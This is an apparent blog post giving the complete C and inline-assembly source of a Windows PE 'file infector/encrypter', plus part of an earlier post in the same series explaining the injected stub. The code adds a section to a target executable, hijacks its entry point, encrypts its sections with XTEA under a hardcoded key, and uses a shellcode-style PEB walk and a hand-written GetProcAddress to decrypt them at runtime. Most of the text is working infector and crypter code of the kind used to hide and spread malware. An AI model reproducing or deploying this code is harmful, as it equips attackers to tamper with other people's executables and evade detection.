RCE Endeavors 😅

April 23, 2011

Writing a File Infector/Encrypter: Full Source Code and Remarks (4/4)

Filed under: Cryptography,General x86,Reverse Engineering — admin @ 5:54 PM

The full source code is reproduced below. The archive at the end of this post contains the source code and a compiled executable. 

Main.cpp

#include <Windows.h>
#include <wchar.h>
#include <stdio.h>
#include "Injector.h"
#include "Encrypter.h"
 
#define BB(x) __asm _emit x
 
#define STRING_COMPARE(str1, str2) \
    __asm push str1 \
    __asm call get_string_length \
    __asm push eax \
    __asm push str1 \
    __asm mov eax, str2 \
    __asm push eax \
    __asm call strings_equal
 
#pragma code_seg(".inject")
void __declspec(naked) injection_stub(void) {
    __asm { //Prologue, stub entry point
        pushad                  //Save context of entry point
        push ebp                //Set up stack frame
        mov ebp, esp
        sub esp, 0x200          //Space for local variables
 
    }
    PIMAGE_DOS_HEADER target_image_base;
    PIMAGE_DOS_HEADER kernel32_image_base;
    __asm {
        call get_module_list    //Get PEB
        mov ebx, eax
        push 0
        push ebx
        call get_dll_base       //Get image base of process
        mov [target_image_base], eax
        push 2
        push ebx
        call get_dll_base       //Get kernel32.dll image base
        mov [kernel32_image_base], eax
    }
    __asm { //Decrypt all sections
        push kernel32_image_base
        push target_image_base
        call decrypt_sections
    }
    //Any additional code can go here
    __asm { //Epilogue, stub exit point
        mov eax, target_image_base
        add eax, 0xCCDDEEFF     //Signature to be replaced by original entry point (OEP)
        mov esp, ebp
        mov [esp+0x20], eax     //Store OEP in EAX through ESP to preserve across popad
        pop ebp
        popad                   //Restore thread context, with OEP in EAX
        jmp eax                 //Jump to OEP
    }
 
    ///////////////////////////////////////////////////////////////////
    //Gets the module list
    //Preserves no registers, PEB_LDR_DATA->PPEB_LDR_DATA->InLoadOrderModuleList returned in EAX
    ///////////////////////////////////////////////////////////////////
    __asm {
    get_module_list:       
            mov eax, fs:[0x30]  //PEB
            mov eax, [eax+0xC]  //PEB_LDR_DATA->PPEB_LDR_DATA
            mov eax, [eax+0xC]  //PEB_LDR_DATA->PPEB_LDR_DATA->InLoadOrderModuleList
            retn
    }
    ///////////////////////////////////////////////////////////////////
 
    ///////////////////////////////////////////////////////////////////
    //Gets the DllBase member of the InLoadOrderModuleList structure
    //Call as void *get_dll_base(void *InLoadOrderModuleList, int index)
    ///////////////////////////////////////////////////////////////////
    __asm {
    get_dll_base:
        push ebp
        mov ebp, esp
        cmp [ebp+0xC], 0x0      //Initial zero check
        je done
        mov ecx, [ebp+0xC]      //Set loop index
        mov eax, [ebp+0x8]      //PEB->PPEB_LDR_DATA->InLoadOrderModuleList address
        traverse_list:
            mov eax, [eax]      //Go to next entry
        loop traverse_list
        done:
            mov eax, [eax+0x18] //PEB->PPEB_LDR_DATA->InLoadOrderModuleList.DllBase
            mov esp, ebp
            pop ebp
            ret 0x8
    }
    ///////////////////////////////////////////////////////////////////
 
    ///////////////////////////////////////////////////////////////////
    //Gets the length of the string passed as the parameter
    //Call as int get_string_length(char *str)
    ///////////////////////////////////////////////////////////////////
    __asm {
    get_string_length:
        push ebp
        mov ebp, esp
        mov edi, [ebp+0x8]      //String held here
        mov eax, 0x0            //EAX holds size of the string
        counting_loop:
            cmp byte ptr[edi], 0x0//Current byte is null-terminator?
            je string_done      //Done, leave loop
            inc edi             //Go to next character
            inc eax             //size++
            jmp counting_loop
        string_done:
            mov esp, ebp
            pop ebp
            retn
    }
    ///////////////////////////////////////////////////////////////////
 
    ///////////////////////////////////////////////////////////////////
    //String comparison function, checks for equality of two strings
    //Call as bool strings_equal(char *check_string, char *known_string, int known_string_length)
    ///////////////////////////////////////////////////////////////////
    __asm {
    strings_equal:
        push ebp
        mov ebp, esp
        mov eax, 0x0            //Assume unequal
        cld                     //Forward comparison
        mov esi, [ebp+0x8]      //ESI gets check_string
        mov edi, [ebp+0xC]      //EDI gets known_string
        mov ecx, [ebp+0x10]     //ECX gets known_string_length
        repe cmpsb              //Start comparing
        jne end
        mov eax, 0x1            //Strings equal
    end:
        mov esp, ebp
        pop ebp
        ret 0xC
    }
    ///////////////////////////////////////////////////////////////////
 
    ///////////////////////////////////////////////////////////////////
    //Implementation of GetProcAddress
    //Call as FARPROC GetProcAddress(HMODULE hModule, LPCSTR lpProcName)
    ///////////////////////////////////////////////////////////////////
    get_proc_address:
        __asm {
            push ebp
            mov ebp, esp
            sub esp, 0x200
        }
        PIMAGE_DOS_HEADER kernel32_dos_header;
        PIMAGE_NT_HEADERS kernel32_nt_headers;
        PIMAGE_EXPORT_DIRECTORY kernel32_export_dir;
        unsigned short *ordinal_table;
        unsigned long *function_table;
        FARPROC function_address;
        int function_names_equal;
        __asm { //Initializations
            mov eax, [ebp+0x8]
            mov kernel32_dos_header, eax
            mov function_names_equal, 0x0
        }
        kernel32_nt_headers = (PIMAGE_NT_HEADERS)((DWORD_PTR)kernel32_dos_header + kernel32_dos_header->e_lfanew);
        kernel32_export_dir = (PIMAGE_EXPORT_DIRECTORY)((DWORD_PTR)kernel32_dos_header + 
            kernel32_nt_headers->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT].VirtualAddress);
        for(unsigned long i = 0; i < kernel32_export_dir->NumberOfNames; ++i) {
            char *eat_entry = (*(char **)((DWORD_PTR)kernel32_dos_header + kernel32_export_dir->AddressOfNames + i * sizeof(DWORD_PTR)))
                + (DWORD_PTR)kernel32_dos_header;   //Current name in name table
            STRING_COMPARE([ebp+0xC], eat_entry) //Compare function in name table with the one we want to find
            __asm mov function_names_equal, eax
            if(function_names_equal == 1) {
                ordinal_table = (unsigned short *)(kernel32_export_dir->AddressOfNameOrdinals + (DWORD_PTR)kernel32_dos_header);
                function_table = (unsigned long *)(kernel32_export_dir->AddressOfFunctions + (DWORD_PTR)kernel32_dos_header);
                function_address = (FARPROC)((DWORD_PTR)kernel32_dos_header + function_table[ordinal_table[i]]);
                break;
            }
        }
        __asm {
            mov eax, function_address
            mov esp, ebp
            pop ebp
            ret 0x8
        }
    ///////////////////////////////////////////////////////////////////
 
    ///////////////////////////////////////////////////////////////////
    //Decrypts all sections in the image, excluding .rdata/.rsrc/.inject
    //Call as void decrypt_sections(void *image_base, void *kernel32_base)
    ///////////////////////////////////////////////////////////////////
    decrypt_sections:
        __asm {
            push ebp
            mov ebp, esp
            sub esp, 0x200
        }
        typedef BOOL (WINAPI *pVirtualProtect)(LPVOID lpAddress, SIZE_T dwSize, DWORD flNewProtect,
            PDWORD lpflOldProtect);
        char *str_virtualprotect;
        char *str_section_name;
        char *str_rdata_name;
        char *str_rsrc_name;
        PIMAGE_DOS_HEADER target_dos_header;
        int section_offset;
        int section_names_equal;
        unsigned long old_protections;
        pVirtualProtect virtualprotect_addr;
        __asm { //String initializations
            jmp virtualprotect
            virtualprotectback:
                pop esi
                mov str_virtualprotect, esi
            jmp section_name
            section_nameback:
                pop esi
                mov str_section_name, esi
            jmp rdata_name
            rdata_nameback:
                pop esi
                mov str_rdata_name, esi
            jmp rsrc_name
            rsrc_nameback:
                pop esi
                mov str_rsrc_name, esi
        }
        __asm { //Initializations
            mov eax, [ebp+0x8]
            mov target_dos_header, eax
            mov section_offset, 0x0
            mov section_names_equal, 0x0
            push str_virtualprotect
            push [ebp+0xC]
            call get_proc_address
            mov virtualprotect_addr, eax
        }
        PIMAGE_NT_HEADERS target_nt_headers = (PIMAGE_NT_HEADERS)((DWORD_PTR)target_dos_header + target_dos_header->e_lfanew);
        for(unsigned long j = 0; j < target_nt_headers->FileHeader.NumberOfSections; ++j) {
            section_offset = (target_dos_header->e_lfanew + sizeof(IMAGE_NT_HEADERS) +
                (sizeof(IMAGE_SECTION_HEADER) * j));
            PIMAGE_SECTION_HEADER section_header = (PIMAGE_SECTION_HEADER)((DWORD_PTR)target_dos_header + section_offset);
            STRING_COMPARE(str_section_name, section_header)
            __asm mov section_names_equal, eax
            STRING_COMPARE(str_rdata_name, section_header)
            __asm add section_names_equal, eax
            STRING_COMPARE(str_rsrc_name, section_header)
            __asm add section_names_equal, eax
            if(section_names_equal == 0) {
                unsigned char *current_byte = 
                    (unsigned char *)((DWORD_PTR)target_dos_header + section_header->VirtualAddress);
                unsigned char *last_byte = 
                    (unsigned char *)((DWORD_PTR)target_dos_header + section_header->VirtualAddress 
                    + section_header->SizeOfRawData);
                const unsigned int num_rounds = 32;
                const unsigned int key[4] = {0x12345678, 0xAABBCCDD, 0x10101010, 0xF00DBABE};
                for(current_byte; current_byte < last_byte; current_byte += 8) {
                    virtualprotect_addr(current_byte, sizeof(DWORD_PTR) * 2, PAGE_EXECUTE_READWRITE, &old_protections);
                    unsigned int block1 = (*current_byte << 24) | (*(current_byte+1) << 16) |
                        (*(current_byte+2) << 8) | *(current_byte+3);
                    unsigned int block2 = (*(current_byte+4) << 24) | (*(current_byte+5) << 16) |
                        (*(current_byte+6) << 8) | *(current_byte+7);
                    unsigned int full_block[] = {block1, block2};
                    unsigned int delta = 0x9E3779B9;
                    unsigned int sum = (delta * num_rounds);
                    for (unsigned int i = 0; i < num_rounds; ++i) {
                        full_block[1] -= (((full_block[0] << 4) ^ (full_block[0] >> 5)) + full_block[0]) ^ (sum + key[(sum >> 11) & 3]);
                        sum -= delta;
                        full_block[0] -= (((full_block[1] << 4) ^ (full_block[1] >> 5)) + full_block[1]) ^ (sum + key[sum & 3]);
                    }
                    virtualprotect_addr(current_byte, sizeof(DWORD_PTR) * 2, old_protections, NULL);
                    *(current_byte+3) = (full_block[0] & 0x000000FF);
                    *(current_byte+2) = (full_block[0] & 0x0000FF00) >> 8;
                    *(current_byte+1) = (full_block[0] & 0x00FF0000) >> 16;
                    *(current_byte+0) = (full_block[0] & 0xFF000000) >> 24;
                    *(current_byte+7) = (full_block[1] & 0x000000FF);
                    *(current_byte+6) = (full_block[1] & 0x0000FF00) >> 8;
                    *(current_byte+5) = (full_block[1] & 0x00FF0000) >> 16;
                    *(current_byte+4) = (full_block[1] & 0xFF000000) >> 24;
                }
            }
            section_names_equal = 0;
        }
        __asm {
            mov esp, ebp
            pop ebp
            ret 0x8
        }
 
    __asm {
    virtualprotect:
        call virtualprotectback
        BB('V') BB('i') BB('r') BB('t') BB('u') BB('a') BB('l')
        BB('P') BB('r') BB('o') BB('t') BB('e') BB('c') BB('t') BB(0)
    rdata_name:
        call rdata_nameback
        BB('.') BB('r') BB('d') BB('a') BB('t') BB('a') BB(0)
    rsrc_name:
        call rsrc_nameback
        BB('.') BB('r') BB('s') BB('r') BB('c') BB(0)
    section_name:
        call section_nameback
        BB('.') BB('i') BB('n') BB('j') BB('e') BB('c') BB('t') BB(0)
        int 0x3                 //Function signature
        int 0x3
        int 0x3
        int 0x3
    }
}
#pragma code_seg()
#pragma comment(linker, "/SECTION:.inject,re")
 
wchar_t *convert_to_unicode(char *str, unsigned int length) {
    wchar_t *wstr;
    int wstr_length = MultiByteToWideChar(CP_ACP, 0, str, (length + 1), NULL, 0);
    wstr = (wchar_t *)malloc(wstr_length * sizeof(wchar_t));
    wmemset(wstr, 0, wstr_length);
    if (wstr == NULL)
        return NULL;
    int written = MultiByteToWideChar(CP_ACP, 0, str, length, wstr, wstr_length);
    if(written > 0)
        return wstr;
    return NULL;
}
 
int main(int argc, char* argv[]) {
    if(argc != 2) {
        printf("Usage: ./%s <target>\n", argv[0]);
        return -1;
    }
    wchar_t *target_file_name = convert_to_unicode(argv[1], strlen(argv[1]));
    if(target_file_name == NULL) {
        printf("Could not convert %s to unicode\n", argv[1]);
        return -1;
    }
    pfile_info target_file = file_info_create();
    void (*stub_addr)(void) = injection_stub;
    unsigned int stub_size = get_stub_size(stub_addr);
    unsigned int stub_size_aligned = 0;
    bool map_file_success = map_file(target_file_name, stub_size, false, target_file);
    if(map_file_success == false) {
        wprintf(L"Could not map target file\n");
        return -1;
    }
    PIMAGE_DOS_HEADER dos_header = (PIMAGE_DOS_HEADER)target_file->file_mem_buffer;
    PIMAGE_NT_HEADERS nt_headers = (PIMAGE_NT_HEADERS)((DWORD_PTR)dos_header + dos_header->e_lfanew);
    stub_size_aligned = align_to_boundary(stub_size, nt_headers->OptionalHeader.SectionAlignment);
    const char *section_name = ".inject";
    file_info_destroy(target_file);
    target_file = file_info_create();
    (void)map_file(target_file_name, stub_size_aligned, true, target_file);
    PIMAGE_SECTION_HEADER new_section = add_section(section_name, stub_size_aligned, target_file->file_mem_buffer);
    if(new_section == NULL) {
        wprintf(L"Could not add new section to file");
        return -1;
    }
    write_stub_entry_point(nt_headers, stub_addr);
    copy_stub_instructions(new_section, target_file->file_mem_buffer, stub_addr);
    change_file_oep(nt_headers, new_section);
    encrypt_file(nt_headers, target_file, section_name);
    int flush_view_success = FlushViewOfFile(target_file->file_mem_buffer, 0);
    if(flush_view_success == 0)
        wprintf(L"Could not save changes to file");
    file_info_destroy(target_file);
    return 0;
}

Injector.cpp

#include "Injector.h"
#include <stdio.h>
 
//Assumes malloc won't fail
pfile_info file_info_create(void) {
    pfile_info mapped_file_info = (pfile_info)malloc(sizeof(file_info));
    memset(mapped_file_info, 0, sizeof(file_info));
    return mapped_file_info;
}
 
//Assumes everything is valid, doesn't report error code
void file_info_destroy(pfile_info mapped_file_info) {
    if(mapped_file_info->file_mem_buffer != NULL)
        UnmapViewOfFile(mapped_file_info->file_mem_buffer);
    if(mapped_file_info->file_handle != NULL)
        CloseHandle(mapped_file_info->file_handle);
    if(mapped_file_info->file_map_handle != NULL)
        CloseHandle(mapped_file_info->file_map_handle);
    free(mapped_file_info);
    mapped_file_info = NULL;
}
 
inline unsigned int align_to_boundary(unsigned int address, unsigned int boundary) {
	return (((address + boundary - 1) / boundary) * boundary);
}
unsigned int get_stub_size(void* stub_addr) {
    unsigned int size = 0;
    if(stub_addr != NULL) {
        const char *stub_signature = "\xCC\xCC\xCC\xCC";
        while(memcmp(((unsigned char *)stub_addr + size), stub_signature, sizeof(int)) != 0)
            ++size;
    }
    return size;
}
 
bool map_file(const wchar_t *file_name, unsigned int stub_size, bool append_mode, pfile_info mapped_file_info) {
    void *file_handle = CreateFile(file_name, GENERIC_READ | GENERIC_WRITE, 0,
        NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL);
    if(file_handle == INVALID_HANDLE_VALUE) {
        wprintf(L"Could not open %s", file_name);
        return false;
    }
    unsigned int file_size = GetFileSize(file_handle, NULL);
    if(file_size == INVALID_FILE_SIZE) {
        wprintf(L"Could not get file size for %s", file_name);
        return false;
    }
    if(append_mode == true) {
        file_size += (stub_size + sizeof(DWORD_PTR));
    }
    void *file_map_handle = CreateFileMapping(file_handle, NULL, PAGE_READWRITE, 0,
        file_size, NULL);
    if(file_map_handle == NULL) {
        wprintf(L"File map could not be opened");
        CloseHandle(file_handle);
        return false;
    }
    void *file_mem_buffer = MapViewOfFile(file_map_handle, FILE_MAP_WRITE, 0, 0, file_size);
    if(file_mem_buffer == NULL) {
        wprintf(L"Could not map view of file");
        CloseHandle(file_map_handle);
        CloseHandle(file_handle);
        return false;
    }
    mapped_file_info->file_handle = file_handle;
    mapped_file_info->file_map_handle = file_map_handle;
    mapped_file_info->file_mem_buffer = (unsigned char*)file_mem_buffer;
    return true;
}
 
//Reference: http://www.codeproject.com/KB/system/inject2exe.aspx
PIMAGE_SECTION_HEADER add_section(const char *section_name, unsigned int section_size, void *image_addr) {
    PIMAGE_DOS_HEADER dos_header = (PIMAGE_DOS_HEADER)image_addr;
    if(dos_header->e_magic != 0x5A4D) {
        wprintf(L"Could not retrieve DOS header from %p", image_addr);
        return NULL;
    }
    PIMAGE_NT_HEADERS nt_headers = (PIMAGE_NT_HEADERS)((DWORD_PTR)dos_header + dos_header->e_lfanew);
    if(nt_headers->OptionalHeader.Magic != 0x010B) {
        wprintf(L"Could not retrieve NT header from %p", dos_header);
        return NULL;
    }
    const int name_max_length = 8;
    PIMAGE_SECTION_HEADER last_section = IMAGE_FIRST_SECTION(nt_headers) + (nt_headers->FileHeader.NumberOfSections - 1);
    PIMAGE_SECTION_HEADER new_section = IMAGE_FIRST_SECTION(nt_headers) + (nt_headers->FileHeader.NumberOfSections);
    memset(new_section, 0, sizeof(IMAGE_SECTION_HEADER));
    new_section->Characteristics = IMAGE_SCN_MEM_READ | IMAGE_SCN_MEM_EXECUTE | IMAGE_SCN_CNT_CODE;
    memcpy(new_section->Name, section_name, name_max_length);
    new_section->Misc.VirtualSize = section_size;
    new_section->PointerToRawData = align_to_boundary(last_section->PointerToRawData + last_section->SizeOfRawData,
        nt_headers->OptionalHeader.FileAlignment);
    new_section->SizeOfRawData = align_to_boundary(section_size, nt_headers->OptionalHeader.SectionAlignment);
    new_section->VirtualAddress = align_to_boundary(last_section->VirtualAddress + last_section->Misc.VirtualSize,
        nt_headers->OptionalHeader.SectionAlignment);
    nt_headers->OptionalHeader.SizeOfImage =  new_section->VirtualAddress + new_section->Misc.VirtualSize;
    nt_headers->FileHeader.NumberOfSections++;
    return new_section;
}
 
void copy_stub_instructions(PIMAGE_SECTION_HEADER section, void *image_addr, void *stub_addr) {
    unsigned int stub_size = get_stub_size(stub_addr);
    memcpy(((unsigned char *)image_addr + section->PointerToRawData), stub_addr, stub_size);
}
 
void change_file_oep(PIMAGE_NT_HEADERS nt_headers, PIMAGE_SECTION_HEADER section) {
    unsigned int file_address = section->PointerToRawData;
    PIMAGE_SECTION_HEADER current_section = IMAGE_FIRST_SECTION(nt_headers);
    for(int i = 0; i < nt_headers->FileHeader.NumberOfSections; ++i) {
        if(file_address >= current_section->PointerToRawData &&
            file_address < (current_section->PointerToRawData + current_section->SizeOfRawData)){
                file_address -= current_section->PointerToRawData;
                file_address += (nt_headers->OptionalHeader.ImageBase + current_section->VirtualAddress);
                break;
        }
    ++current_section;
    }
    nt_headers->OptionalHeader.AddressOfEntryPoint =  file_address - nt_headers->OptionalHeader.ImageBase;
}
 
void write_stub_entry_point(PIMAGE_NT_HEADERS nt_headers, void *stub_addr) {
    if(stub_addr != NULL) {
        const char *signature = "\xFF\xEE\xDD\xCC";
        unsigned int index = 0;
        while(memcmp(((unsigned char *)stub_addr + index), signature, sizeof(int)) != 0) {
            ++index;
        }
        DWORD old_protections = 0;
        VirtualProtect(((unsigned char *)stub_addr + index), sizeof(DWORD), PAGE_EXECUTE_READWRITE, &old_protections);
        memcpy(((unsigned char *)stub_addr + index), &nt_headers->OptionalHeader.AddressOfEntryPoint, sizeof(DWORD));
        VirtualProtect(((unsigned char *)stub_addr + index), sizeof(DWORD), old_protections, NULL);
    }
}

Injector.h

#pragma once
#include <Windows.h>
 
typedef struct {
    void *file_handle;
    void *file_map_handle;
    unsigned char *file_mem_buffer;
} file_info, *pfile_info;
 
pfile_info file_info_create(void);
void file_info_destroy(pfile_info mapped_file_info);
unsigned int align_to_boundary(unsigned int address, unsigned int boundary);
unsigned int get_stub_size(void* stub_addr);
bool map_file(const wchar_t *file_name, unsigned int stub_size, bool append_mode, pfile_info mapped_file_info);
PIMAGE_SECTION_HEADER add_section(const char *section_name, unsigned int section_size, void *image_addr);
void copy_stub_instructions(PIMAGE_SECTION_HEADER section, void *image_addr, void *stub_addr);
void change_file_oep(PIMAGE_NT_HEADERS nt_headers, PIMAGE_SECTION_HEADER section);
void write_stub_entry_point(PIMAGE_NT_HEADERS nt_headers, void *stub_addr);

Encrypter.cpp

#include "Encrypter.h"
#include <stdio.h>
 
void encrypt_file(PIMAGE_NT_HEADERS nt_headers, pfile_info target_file, const char *excluded_section_name) {
    PIMAGE_SECTION_HEADER current_section = IMAGE_FIRST_SECTION(nt_headers);
    const char *excluded_sections[] = {".rdata", ".rsrc", excluded_section_name};
    for(int i = 0; i < nt_headers->FileHeader.NumberOfSections; ++i) {
        int excluded = 1;
        for(int j = 0; j < sizeof(excluded_sections)/sizeof(excluded_sections[0]); ++j)
            excluded &= strcmp(excluded_sections[j], (char *)current_section->Name);
        if(excluded != 0) {
            unsigned char *section_start = 
                (unsigned char *)target_file->file_mem_buffer + current_section->PointerToRawData;
            unsigned char *section_end = section_start + current_section->SizeOfRawData;
            const unsigned int num_rounds = 32;
            const unsigned int key[] = {0x12345678, 0xAABBCCDD, 0x10101010, 0xF00DBABE};
            for(unsigned char *k = section_start; k < section_end; k += 8) {
                unsigned int block1 = (*k << 24) | (*(k+1) << 16) | (*(k+2) << 8) | *(k+3);
                unsigned int block2 = (*(k+4) << 24) | (*(k+5) << 16) | (*(k+6) << 8) | *(k+7);
                unsigned int full_block[] = {block1, block2};
                encrypt(num_rounds, full_block, key);
                full_block[0] = swap_endianess(full_block[0]);
                full_block[1] = swap_endianess(full_block[1]);
                memcpy(k, full_block, sizeof(full_block));
            }
        }
        current_section++;
    }
}
 
//Encryption/decryption routines modified from http://en.wikipedia.org/wiki/XTEA
void encrypt(unsigned int num_rounds, unsigned int blocks[2], unsigned int const key[4]) {
    const unsigned int delta = 0x9E3779B9;
    unsigned int sum = 0;
    for (unsigned int i = 0; i < num_rounds; ++i) {
        blocks[0] += (((blocks[1] << 4) ^ (blocks[1] >> 5)) + blocks[1]) ^ (sum + key[sum & 3]);
        sum += delta;
        blocks[1] += (((blocks[0] << 4) ^ (blocks[0] >> 5)) + blocks[0]) ^ (sum + key[(sum >> 11) & 3]);
    }
}
 
//Unused, kept for testing/verification
void decrypt(unsigned int num_rounds, unsigned int blocks[2], unsigned int const key[4]) {
    const unsigned int delta = 0x9E3779B9;
    unsigned int sum = delta * num_rounds;
    for (unsigned int i = 0; i < num_rounds; ++i) {
        blocks[1] -= (((blocks[0] << 4) ^ (blocks[0] >> 5)) + blocks[0]) ^ (sum + key[(sum >> 11) & 3]);
        sum -= delta;
        blocks[0] -= (((blocks[1] << 4) ^ (blocks[1] >> 5)) + blocks[1]) ^ (sum + key[sum & 3]);
    }
}
 
inline unsigned int swap_endianess(unsigned int value) {
    return (value >> 24) |  ((value << 8) & 0x00FF0000) |
        ((value >> 8) & 0x0000FF00) | (value << 24);
}

Encrypter.h

#pragma once
#include "Injector.h"
 
void encrypt_file(PIMAGE_NT_HEADERS nt_headers, pfile_info target_file, const char *excluded_section_name);
void encrypt(unsigned int num_rounds, unsigned int blocks[2], unsigned int const key[4]);
void decrypt(unsigned int num_rounds, unsigned int blocks[2], unsigned int const key[4]);
unsigned int swap_endianess(unsigned int value);

A few general remarks about the code:

  • Programs utilizing TLS callbacks may or may not work properly (depending on what the callbacks do). Full support for TLS callbacks can be implemented without issue
  • An interesting idea would be to decrypt sections or pages as needed. This could be done by setting memory breakpoints on the sections or on individual pages. The instructions can be encrypted again afterwards once they’ve executed. This requires quite a bit of work in implementing a SEH handler in assembly and registering the exception in the processes exception list.
  • This code only works on x86 executables. This is extremely obvious and not much can be done in that regard.
  • The source needs to be built in release mode with any sort of extra optimizations/security (ESP checking/security cookies) disabled.

The source code and compiled sample can be found here
A Visual Studio 2010 project can be found here
A downloadable PDF of this post can be found here

Writing a File Infector/Encrypter: Writing the Compiled Stub (3/4)

Filed under: Cryptography,General x86,Reverse Engineering — admin @ 5:54 PM

This post will explain the “bulk” of the file infector. It will focus on writing the code to be injected and how to take advantage of the compiler to generate the instructions to inject into the target application. I will clarify that generating the instructions to inject means that the infector will be writing part of itself into the target application, and not that it will generate an additional assembly listing with any compiler flags which is then injected into the target by a different means. The main concept is that this will be done by declaring a naked function whose functionality is independent of in memory it is written and what program it is injected into (architecture limitations aside, obviously). The infector will then read the functions contents in memory and write it into the target application. The injection code needs to do several important things:

  • Preserve the registers upon entry (simple pushad/popad instructions). I miss the hell out of these two instructions in x86-64).
  • Find and store the load address of the image and of kernel32.dll
  • Implement GetProcAddress as well as some C runtime functions such as strcmp and strlen
  • Decrypt all encrypted sections in memory
  • Return execution to the normal application

Finding the load address and the address of kernel32.dll is pretty straightforward. The technique that I used is an old shellcoding technique and should be compatible for Win XP to Windows 7. It works by finding the Process Environment Block (PEB) and then traversing the InLoadOrderModuleList found in PEB_LDR_DATA->PPEB_LDR_DATA. The definitions for these structures are all found in the link above. InLoadOrderModuleList is not found on MSDN, but the NTInternals site has the “proper” definition. Using the PEB is a great way to do this since it can always be found at the same location, mainly fs:[0x30]. What makes InLoadOrderModuleList so special is that the first entry will be the load address of the image. This is great because now there’s no worry about randomized base addresses. Also, the third entry will be the load address of kernel32.dll, which contains LoadLibrary and other very useful APIs such as VirtualProtect. The code for the injection function then, so far, looks like this:

void __declspec(naked) injection_stub(void) {
    __asm { //Prologue, stub entry point
        pushad                   //Save context of entry point
        push ebp                //Set up stack frame
        mov ebp, esp
        sub esp, 0x200        //Space for local variables
 
    }
    PIMAGE_DOS_HEADER target_image_base;
    PIMAGE_DOS_HEADER kernel32_image_base;
    __asm {
        call get_module_list   //Get PEB
        mov ebx, eax
        push 0
        push ebx
        call get_dll_base       //Get image base of process
        mov [target_image_base], eax
        push 2
        push ebx
        call get_dll_base       //Get kernel32.dll image base
        mov [kernel32_image_base], eax
    }

A stack frame is set up so the local variables can be referenced without issue. The value subtracted from ESP to make space for the local variables does not need to be exact since there’s no way to tell how the compiler will allocate the local variables in the stack frame. The value simply needs to be large enough that the state of the stack won’t get messed up by these allocations. It is possible to go back and look at the assembly dump of the function and modify the value so that there’s just enough room for those worried about space/cleanliness. With that out of the way, the remainder of the code calls two other functions, get_module_list and get_dll_base, which get InLoadOrderModuleList and an entry in InLoadOrderModuleList respectively. These are implemented as follows:

///////////////////////////////////////////////////////////////////
//Gets the module list
//Preserves no registers, PEB_LDR_DATA->PPEB_LDR_DATA->InLoadOrderModuleList returned in EAX
///////////////////////////////////////////////////////////////////
__asm {
get_module_list:       
        mov eax, fs:[0x30]   //PEB
        mov eax, [eax+0xC]  //PEB_LDR_DATA->PPEB_LDR_DATA
        mov eax, [eax+0xC]  //PEB_LDR_DATA->PPEB_LDR_DATA->InLoadOrderModuleList
        retn
}
///////////////////////////////////////////////////////////////////
 
///////////////////////////////////////////////////////////////////
//Gets the DllBase member of the InLoadOrderModuleList structure
//Call as void *get_dll_base(void *InLoadOrderModuleList, int index)
///////////////////////////////////////////////////////////////////
__asm {
get_dll_base:
    push ebp
    mov ebp, esp
    cmp [ebp+0xC], 0x0      //Initial zero check
    je done
    mov ecx, [ebp+0xC]      //Set loop index
    mov eax, [ebp+0x8]      //PEB->PPEB_LDR_DATA->InLoadOrderModuleList address
    traverse_list:
        mov eax, [eax]        //Go to next entry
    loop traverse_list
    done:
        mov eax, [eax+0x18] //PEB->PPEB_LDR_DATA>InLoadOrderModuleList.DllBase
        mov esp, ebp
        pop ebp
        ret 0x8
}
///////////////////////////////////////////////////////////////////

The next step is to implement GetProcAddress. The code for this is shown below:

///////////////////////////////////////////////////////////////////
//Implementation of GetProcAddress
//Call as FARPROC GetProcAddress(HMODULE hModule, LPCSTR lpProcName)
///////////////////////////////////////////////////////////////////
get_proc_address:
    __asm {
        push ebp
        mov ebp, esp
        sub esp, 0x200
    }
    PIMAGE_DOS_HEADER kernel32_dos_header;
    PIMAGE_NT_HEADERS kernel32_nt_headers;
    PIMAGE_EXPORT_DIRECTORY kernel32_export_dir;
    unsigned short *ordinal_table;
    unsigned long *function_table;
    FARPROC function_address;
    int function_names_equal;
    __asm { //Initializations
        mov eax, [ebp+0x8]
        mov kernel32_dos_header, eax
        mov function_names_equal, 0x0
    }
    kernel32_nt_headers = (PIMAGE_NT_HEADERS)((DWORD_PTR)kernel32_dos_header + kernel32_dos_header->e_lfanew);
    kernel32_export_dir = (PIMAGE_EXPORT_DIRECTORY)((DWORD_PTR)kernel32_dos_header + 
        kernel32_nt_headers->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT].VirtualAddress);
    for(unsigned long i = 0; i < kernel32_export_dir->NumberOfNames; ++i) {
        char *eat_entry = (*(char **)((DWORD_PTR)kernel32_dos_header + kernel32_export_dir->AddressOfNames + i * sizeof(DWORD_PTR)))
            + (DWORD_PTR)kernel32_dos_header;   //Current name in name table
        STRING_COMPARE([ebp+0xC], eat_entry) //Compare function in name table with the one we want to find
        __asm mov function_names_equal, eax
        if(function_names_equal == 1) {
            ordinal_table = (unsigned short *)(kernel32_export_dir->AddressOfNameOrdinals + (DWORD_PTR)kernel32_dos_header);
            function_table = (unsigned long *)(kernel32_export_dir->AddressOfFunctions + (DWORD_PTR)kernel32_dos_header);
            function_address = (FARPROC)((DWORD_PTR)kernel32_dos_header + function_table[ordinal_table[i]]);
            break;
        }
    }
    __asm {
        mov eax, function_address
        mov esp, ebp
        pop ebp
        ret 0x8
    }
///////////////////////////////////////////////////////////////////

This function looks pretty complex, but in actuality it is pretty simple. The image below reproduced from Matt Pietrek’s article will clarify things a lot.

This function starts off by finding the export directory (IMAGE_EXPORT_DIRECTORY structure) in kernel32.dll. This structure contains all of the relevant information about the exports of kernel32.dll. A loop is set to iterate through all of the exported functions. Then an entry from the name table (AddressOfNames) is retrieved. This is the name of the function that is exported by the DLL (e.g. “LoadLibraryA”, “GetSystemInfo”, etc..). This string is then compared with the string of the function to find. If there is a match, the ordinal number is obtained from the ordinal table (AddressOfNameOrdinals). This is then used as an index into the function address table (AddressOfFunctions) to retrieve the address of the function. And that’s all there is to it. STRING_COMPARE is just a macro that calls the implementations of strlen and strcmp variant. The macro and two functions are pretty straightforward and don’t really warrant any discussion. Now that GetProcAddress is implemented, the next step is to use it to decrypt the sections in memory. This will utilize VirtualProtect API and also the decryption function for the XTEA block cipher. The function, in its entirety, is shown below:

///////////////////////////////////////////////////////////////////
//Decrypts all sections in the image, excluding .rdata/.rsrc/.inject
//Call as void decrypt_sections(void *image_base, void *kernel32_base)
///////////////////////////////////////////////////////////////////
decrypt_sections:
    __asm {
        push ebp
        mov ebp, esp
        sub esp, 0x200
    }
    typedef BOOL (WINAPI *pVirtualProtect)(LPVOID lpAddress, SIZE_T dwSize, DWORD flNewProtect,
        PDWORD lpflOldProtect);
